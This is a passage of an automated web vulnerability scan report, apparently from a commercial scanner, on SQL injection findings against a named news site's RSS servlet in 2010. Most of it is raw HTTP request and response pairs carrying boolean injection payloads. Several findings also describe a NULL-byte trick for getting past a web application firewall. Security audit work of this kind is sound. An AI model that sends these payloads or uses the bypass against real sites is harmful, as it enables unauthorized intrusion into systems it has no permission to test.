<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet20519805'%20or%201%3d2--%20/568/200774.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:20:00 GMT
Content-Length: 0
Connection: close


1.52. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200775.xml [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200775.xml

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /mngi/rss/CustomRssServlet/568/200775.xml%00' HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Expires: Tue, 07 Dec 2010 23:20:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 07 Dec 2010 23:20:35 GMT
Connection: close

<h1>Bad Request (Invalid URL)</h1>

Request 2

GET /mngi/rss/CustomRssServlet/568/200775.xml%00'' HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/xml;charset=utf-8
Expires: Tue, 07 Dec 2010 23:20:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 07 Dec 2010 23:20:35 GMT
Content-Length: 9151
Connection: close
Set-Cookie: JSESSIONID=N1KD1P1UCQUPUCUUCAJSFGQ; path=/

<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
version="2.0">
<channel>
<atom:link href="http://fee
...[SNIP]...

1.53. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200776.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200776.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200776.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:22 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200776.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:20:23 GMT
Date: Tue, 07 Dec 2010 23:20:23 GMT
Content-Length: 424
Connection: close

<HTML>
<!-- This file is for Error code #404 - Not Found -->
<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>


1.54. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200776.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200776.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /mngi/rss/CustomRssServlet/568%00'/200776.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Date: Tue, 07 Dec 2010 23:20:36 GMT
Connection: close

<h1>Bad Request (Invalid URL)</h1>

Request 2

GET /mngi/rss/CustomRssServlet/568%00''/200776.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:20:37 GMT
Content-Length: 0
Connection: close


1.55. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200777.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200777.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 18366774'%20or%201%3d1--%20 and 18366774'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi18366774'%20or%201%3d1--%20/rss/CustomRssServlet/568/200777.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:21 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi18366774'%20or%201%3d2--%20/rss/CustomRssServlet/568/200777.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:20:21 GMT
Date: Tue, 07 Dec 2010 23:20:21 GMT
Content-Length: 424
Connection: close

<HTML>
<!-- This file is for Error code #404 - Not Found -->
<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>


1.56. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200778.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200778.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 93033723%20or%201%3d1--%20 and 93033723%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/56893033723%20or%201%3d1--%20/200778.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:39 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet/56893033723%20or%201%3d2--%20/200778.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:20:39 GMT
Content-Length: 0
Connection: close


1.57. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200779.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200779.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 18035737'%20or%201%3d1--%20 and 18035737'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet18035737'%20or%201%3d1--%20/568/200779.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:41 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet18035737'%20or%201%3d2--%20/568/200779.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:20:42 GMT
Content-Length: 0
Connection: close


1.58. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200781.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200781.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 11112058'%20or%201%3d1--%20 and 11112058'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi11112058'%20or%201%3d1--%20/rss/CustomRssServlet/568/200781.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:34 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi11112058'%20or%201%3d2--%20/rss/CustomRssServlet/568/200781.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:20:34 GMT
Date: Tue, 07 Dec 2010 23:20:34 GMT
Content-Length: 424
Connection: close

<HTML>
<!-- This file is for Error code #404 - Not Found -->
<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>


1.59. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200782.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200782.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200782.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:20:34 GMT
Date: Tue, 07 Dec 2010 23:20:34 GMT
Content-Length: 424
Connection: close

<HTML>
<!-- This file is for Error code #404 - Not Found -->
<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>

Request 2

GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200782.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:34 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.60. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200782.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200782.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 12983011'%20or%201%3d1--%20 and 12983011'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet12983011'%20or%201%3d1--%20/568/200782.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:40 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet12983011'%20or%201%3d2--%20/568/200782.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:20:40 GMT
Content-Length: 0
Connection: close


